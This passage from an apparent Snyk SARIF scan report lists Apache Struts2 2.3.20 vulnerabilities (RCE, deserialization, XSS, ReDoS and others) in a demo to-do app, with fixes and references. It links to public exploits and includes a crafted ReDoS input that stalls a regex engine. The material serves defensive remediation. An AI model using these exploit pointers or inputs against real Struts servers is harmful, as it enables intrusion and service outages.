Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "shortDescription": { + "text": "High severity - Manipulation of Struts' internals vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2015-5209) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n`ValueStack` defines special `top` object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n# References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-284", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "shortDescription": { + "text": "High severity - Command Injection vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-3081) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. 
When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n# References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-77", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4003) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n# Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a 
request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n## Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. 
The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n## Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n## How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "maven" + ], + "cvssv3_baseScore": 6.1, + "security-severity": "6.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "shortDescription": { + "text": "High severity - Cross-site Request Forgery (CSRF) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4430) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). 
It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n# References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-352", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "shortDescription": { + "text": "High severity - Access Restriction Bypass vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4431) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n# References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "shortDescription": { + "text": "High severity - Access Restriction Bypass vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4433) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "shortDescription": { + "text": "High severity - Arbitrary Command Execution vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9805) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. 
An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). 
These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n# Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. 
Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n# References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9787) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system 
inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n# References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9804) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). 
If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n# References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9793) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n# References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "shortDescription": { + "text": "High severity - Remote Code Execution vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2018-11776) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# 
Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n# References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4465) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: 
org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). 
The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. 
When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "shortDescription": { + "text": "Medium severity - Allocation of Resources Without Limits or Throttling vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2023-34149) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and 